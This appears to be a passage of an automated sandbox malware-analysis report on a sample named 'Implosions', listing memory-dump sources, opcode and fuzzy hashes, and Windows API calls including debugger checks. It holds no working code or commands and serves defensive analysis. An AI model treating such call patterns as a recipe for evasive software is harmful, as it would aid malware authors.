              • Opcode ID: 7e07776276a65f5c5bed31a632c6a43187a5f6e5385eb6e2f17e8b598090470c
              • Instruction ID: ae149da6b73b3be83c8c216ec99f83dbc32a1bd2afd1351e750f42310c302326
              • Opcode Fuzzy Hash: 7e07776276a65f5c5bed31a632c6a43187a5f6e5385eb6e2f17e8b598090470c
              • Instruction Fuzzy Hash: 70E04836360114774B017A9DF4058ED7B9AEBD53717408437F944C7300CE31991597A4
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67f77fd1f4246c7635b9ffaa767f80c957c6ae6839ac0d0ce11f5f0067f1759f
              • Instruction ID: ea9c30291be04f01f87e751941512cbb61b7565a152e820fabd6cf93091be1a2
              • Opcode Fuzzy Hash: 67f77fd1f4246c7635b9ffaa767f80c957c6ae6839ac0d0ce11f5f0067f1759f
              • Instruction Fuzzy Hash: 37E04F727042046B4754CA5ED444E9ABBEDDFC82B1314C02AF90CC7300DA31E9428BA4
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77ecfce0745e8f9eb4cb5fa2b5b2603c7b7f115e66dda149592c23a7cc7bf241
              • Instruction ID: a6bc37051a8a4bfe9c0d834f53588e3a3a0960c7b29e00590085ceb00daa557a
              • Opcode Fuzzy Hash: 77ecfce0745e8f9eb4cb5fa2b5b2603c7b7f115e66dda149592c23a7cc7bf241
              • Instruction Fuzzy Hash: 27E09A31B000055B8B40EBA9E5908BEF7FAEF84350360C836E508E7368DB30EE0287A1
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e7c2a487fd7038ecc0727e28d9334d5651f902775d35c824bc4354c0115ddaa
              • Instruction ID: 177d721d333e9bb677b1aba9ec46175a89ad6ff8079bd68daa4683dcf9b41be3
              • Opcode Fuzzy Hash: 9e7c2a487fd7038ecc0727e28d9334d5651f902775d35c824bc4354c0115ddaa
              • Instruction Fuzzy Hash: 94E04F367002185FC750DA68D440F5BBBE6EF44AA0F558426F90CDB795E731DE4297C4
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 255b8d9dab743cecc788457d6f8ad2c5c9d4c9a3818d7b154555a8511f0481f2
              • Instruction ID: cbefcbfbb7df790cdc95eb95e7bae3d84524883516c04e19c2c755a42a5ecb79
              • Opcode Fuzzy Hash: 255b8d9dab743cecc788457d6f8ad2c5c9d4c9a3818d7b154555a8511f0481f2
              • Instruction Fuzzy Hash: 10E0267270031043DF182A742A007BC958BDFC0121F1C0C3AC606CB280DD76CC02D394
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f47cd09724e222655cf3a756b62f0223e2c5a68ce05ad7d0fad29523f017a6c0
              • Instruction ID: a0acd0e984c1d789b07fd5cd29a2ed812cf5634430e73adab9f5aff648f401dc
              • Opcode Fuzzy Hash: f47cd09724e222655cf3a756b62f0223e2c5a68ce05ad7d0fad29523f017a6c0
              • Instruction Fuzzy Hash: 40E026227101102BC3066228F8517DB951BDFC0340F90CF7892148B264CF20AC0E0BE8
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7577823238388c5f633c39144e34db3a63e359415285685d16eef6ac03fd884c
              • Instruction ID: 4dca91d76ddcecc7e5c9a62216496c24ba78b51a51922786712086338453e696
              • Opcode Fuzzy Hash: 7577823238388c5f633c39144e34db3a63e359415285685d16eef6ac03fd884c
              • Instruction Fuzzy Hash: E1E0867231111467D3047659D455BEF7AAADBC9B22F54403AE501C7340CD75D802C7D0
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6b20eee5c015d2bad75acc8650c8798a5da9439c1fe2be47a4946fa77dfcdcd
              • Instruction ID: 77f08212a684298d99aaf5682e38339562e33d56b1171ed744414e9264bbd0f1
              • Opcode Fuzzy Hash: f6b20eee5c015d2bad75acc8650c8798a5da9439c1fe2be47a4946fa77dfcdcd
              • Instruction Fuzzy Hash: A3E0DF35304B408FD701D76CC958D2A7FE9DF8D30470488AAF547CB362CA68EC408B84
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e531cfc3cdcd629846b1773ffceef25f5c85f5398415f4e1d5876e5de165cc68
              • Instruction ID: a6a2bee0e457ac50760277a7cd15dca8af34dfdbbba8909160fd316ee8ca877e
              • Opcode Fuzzy Hash: e531cfc3cdcd629846b1773ffceef25f5c85f5398415f4e1d5876e5de165cc68
              • Instruction Fuzzy Hash: BAE06F32106712AFD720AF2CD689722BB90FB02628F80008FE049C3A01CBA4E4829B42
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8f69c826cbda2a1ab59d309f14f2568f80e393c9cc598c94f12b9f8c7e644b74
              • Instruction ID: a5018e11f6d50424ba5036ca4c6184b5c3c714fb7421a01750d930c6960ae88e
              • Opcode Fuzzy Hash: 8f69c826cbda2a1ab59d309f14f2568f80e393c9cc598c94f12b9f8c7e644b74
              • Instruction Fuzzy Hash: A1E01270D40215DF8B40DFA9A84919D7FB4FB44200F104966E45AE3200E7718A25CBD1
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee84eb5af47be9453b20d19e5b1f3a3162b28d120a19642e605b68bce3f4d30f
              • Instruction ID: fb7e9a412328b5414a3d12eddab45b5e29ef3d4fc8b251d39ed4c804d0b26b99
              • Opcode Fuzzy Hash: ee84eb5af47be9453b20d19e5b1f3a3162b28d120a19642e605b68bce3f4d30f
              • Instruction Fuzzy Hash: 24E0C2327003147B47146A9EB84485ABBABFFCC6B1390403AFA0AC3300CE319C12C7E8
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93f8d23b587e756a25b8b86d32fc10d0242dd861a8d0f46334ea8f29698735a9
              • Instruction ID: de09258fe382bbcf48b1c41bea5ca2c93f14dd77dba678c8152ff351f6c84d47
              • Opcode Fuzzy Hash: 93f8d23b587e756a25b8b86d32fc10d0242dd861a8d0f46334ea8f29698735a9
              • Instruction Fuzzy Hash: 68E0ED74E09308AFCB44DFA9D45584DBFF1EB49300F0085EAE808D7341E6349A14CB45
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf4fda5afeaea5f043f81165331fe67f6d0a65e3194e2003e6b4bafb2ddb50e3
              • Instruction ID: acab2d07ca48f29e15c9be68357e94246c74abdb469d6f0c49ec0d1fb3b643fb
              • Opcode Fuzzy Hash: bf4fda5afeaea5f043f81165331fe67f6d0a65e3194e2003e6b4bafb2ddb50e3
              • Instruction Fuzzy Hash: 6ED02B3230D35087C710069F68008533B5DDEC695130A047BF405C7B80D821CC458391
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d35d33042a5d69d54f41466abf86e85ef1bf444b3c9092b0cf43c6406affc847
              • Instruction ID: 60744ae213befa861db18c01df8c2f30330bdaa85a65363b049ea3dfc3627884
              • Opcode Fuzzy Hash: d35d33042a5d69d54f41466abf86e85ef1bf444b3c9092b0cf43c6406affc847
              • Instruction Fuzzy Hash: D9E08C313407109FC700EB6DD848C6ABBEDEF887143008869F106C7320CAA5FC418BC4
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 45fd177836c5a5234b1fbc9777bca29eb0df97a8159a2fdefaf486e82c6fc00b
              • Instruction ID: a16ebb1725bc30dbe706183367a483365a3b01c754228fa64d7c46043cf25c1b
              • Opcode Fuzzy Hash: 45fd177836c5a5234b1fbc9777bca29eb0df97a8159a2fdefaf486e82c6fc00b
              • Instruction Fuzzy Hash: 8CE0124366D3D04FE7471664DD637983F30CB43351F1940F3D080CA5E7D40448498267
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7d0d0ae8660c4b263e06c5533f8abfcc8d3ae591306946c1969d65bd24dccb0b
              • Instruction ID: 5ed3229bbd5895105260dfed983b366864657f94fcc336280e61b68e14eb791a
              • Opcode Fuzzy Hash: 7d0d0ae8660c4b263e06c5533f8abfcc8d3ae591306946c1969d65bd24dccb0b
              • Instruction Fuzzy Hash: 5DD0C23131121467C2046769A014AEA7A9ADBC9722B10402AE50187340CD319C02C7E0
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 309a28d402614cefa994a0fc51472a61a08794c6d950e8762ff2bf4841a300fc
              • Instruction ID: 7c604ec120a5f592b51a2f280383b473429d1f19e3b38cebc3491270d8106a42
              • Opcode Fuzzy Hash: 309a28d402614cefa994a0fc51472a61a08794c6d950e8762ff2bf4841a300fc
              • Instruction Fuzzy Hash: F8D017312213148FC7586FB5B40A1997BA8FA456A6388046AF80AC3640DF3AAC11CAE9
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 004136F4
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
              • TerminateProcess.KERNEL32(00000000), ref: 00413737
              Strings
              • String ID: 45_q
              Strings
              • String ID: @$@$PA
              APIs
              • GetProcessHeap.KERNEL32 ref: 0040ADD0
              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
              Strings
              • String ID: Hbq
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
              • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
              • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
              • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb09f19ac7b889c1c886bb29050a0d3e7470f1b649b3c481f9037949f1f00bb4
              • Instruction ID: 04ce333188ffb89b2882b5db2ed635ce43689d9ee0d9d2fa81dd8b8d295a4092
              • Opcode Fuzzy Hash: cb09f19ac7b889c1c886bb29050a0d3e7470f1b649b3c481f9037949f1f00bb4
              • Instruction Fuzzy Hash: BD321D30E50B0A96EB21DA64CC41BD9F371BF9A700F60C746F6587A580EBB0B6D58B90
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
              • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
              • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77cdf1339ee5f84181c276ad54d5aaa8063b6ec41addf0e9ac0b685167beb2c6
              • Instruction ID: 679ce2e7512b98843f22d9b0bd0a3d4b678ed9335db438d4a250dc406977e369
              • Opcode Fuzzy Hash: 77cdf1339ee5f84181c276ad54d5aaa8063b6ec41addf0e9ac0b685167beb2c6
              • Instruction Fuzzy Hash: A3C12E647803289BD648E6BC49A477BA89F9BCC740F544C99510EDB3E8DCAACD8703F5
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              APIs
              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022318C0), ref: 004170C5
              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
              • _malloc.LIBCMT ref: 0041718A
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
              • _malloc.LIBCMT ref: 0041724C
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
              • __freea.LIBCMT ref: 004172A4
              • __freea.LIBCMT ref: 004172AD
              • ___ansicp.LIBCMT ref: 004172DE
              • ___convertcp.LIBCMT ref: 00417309
              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
              • _malloc.LIBCMT ref: 00417362
              • _memset.LIBCMT ref: 00417384
              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
              • ___convertcp.LIBCMT ref: 004173BA
              • __freea.LIBCMT ref: 004173CF
              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
              • String ID:
              • API String ID: 3809854901-0
              APIs
              • _malloc.LIBCMT ref: 004057DE
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • _malloc.LIBCMT ref: 00405842
              • _malloc.LIBCMT ref: 00405906
              • _malloc.LIBCMT ref: 00405930
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _malloc$AllocateHeap
              • String ID: 1.2.3
              • API String ID: 680241177-2310465506
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
              • String ID:
              • API String ID: 3886058894-0
              APIs
              • __lock_file.LIBCMT ref: 0040C6C8
              • __fileno.LIBCMT ref: 0040C6D6
              • __fileno.LIBCMT ref: 0040C6E2
              • __fileno.LIBCMT ref: 0040C6EE
              • __fileno.LIBCMT ref: 0040C6FE
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
